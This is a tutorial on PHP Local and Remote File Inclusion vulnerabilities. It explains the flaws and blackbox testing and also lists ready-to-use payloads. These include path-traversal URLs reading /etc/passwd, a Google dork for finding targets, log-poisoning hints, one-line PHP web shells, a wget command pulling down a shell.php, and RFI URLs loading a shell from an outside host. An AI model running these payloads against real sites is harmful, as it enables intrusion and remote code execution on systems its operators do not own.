LFI-RFI

LFI And RFI Vulnerabilities

LFI and RFI —- The Website Security Vulnerabilities

A File inclusion vulnerability is a type of vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time.

A file include vulnerability is distinct from a generic Directory Traversal Attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file include vulnerability will result in remote code execution on the web server that runs the affected web application.

Local File Inclusion :

Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included for execution. This issue can still lead to remote code execution by including a file that contains attacker-controlled data such as the web server’s access logs.

Example of LFI 

Type of call:
require($file);
Exploit:
http://host/?file=/etc/passwd

Type of call:
require(“includes/”.$file);
Exploit:
http://host/?file=../../../../../etc/passwd

Tpye of calls:
require(“languages/”.$lang.”.php”);
require(“themes/”.$theme.”/config.php”);
Exploit:
http://host/?file=../../../../../etc/passwd%00

Type of call:
require(“languages/”.$_COOKIE[‘lang’].”.php”);
Exploit:
javascript:document.cookie = “lan=../../../../../etc/passwd%00″;

That is to include the file of the server in our browser
<?php include($_GET[”]) ?>

Google dork: inurl:.php?page=
Example : www.xyz.com/contacts.php?page=abc.php
www.xyz.com/abc.php?id=5
test : www.xyz.com/contacts.php?page=../xyz.php

Now in linux server there is etc/passwd file which contain username and password of all the domains hosted on the same server
1… www.abc.org/index.php?page=../../../../etc/passwd%00
2… www.abc.com/index.php?page=../../../../etc/passwd

proc/self/environ is the writable file by the end user
or var/log/httpd-access.log is also writable
usr/local/apache/conf/httpd.conf —-> gives the path of all logs file
<?php passthru($_GET[‘cmd’]) ?>
<?php system($_GET[‘cmd’]) ?>
<?php exec($_GET[‘cmd’]) ?>
wget http://xyz.com/abc.txt -O shell.php

How to Test Local File Inclusion

Since LFI occurs when paths passed to “include” statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters.

Consider the following example:

http://vulnerable_host/preview.php?file=example.html

This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.

Typical proof-of-concept would be to load passwd file:

http://vulnerable_host/preview.php?file=../../../../etc/passwd

Remote File Inclusion:

Remote File Inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application.

RFI – Remote file inclusion

If allow_url_include is On in php.ini, then we can inject a shell directly.

You only need to load by GET or POST directly to an URI with the shell (using a non PHP extension):
www.xyz.com/contacts.php?page=http://www.abc.com/shell.php

How To Test RFI

Since RFI occurs when paths passed to “include” statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters. Consider the following PHP example:

$incfile = $_REQUEST["file"];
include($incfile.".php");

In this example the path is extracted from the HTTP request and no input validation is done (for example, by checking the input against a white list), so this snippet of code results vulnerable to this type of attack. Consider infact the following URL:

http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page

In this case the remote file is going to be included and any code contained in it is going to be run by the server.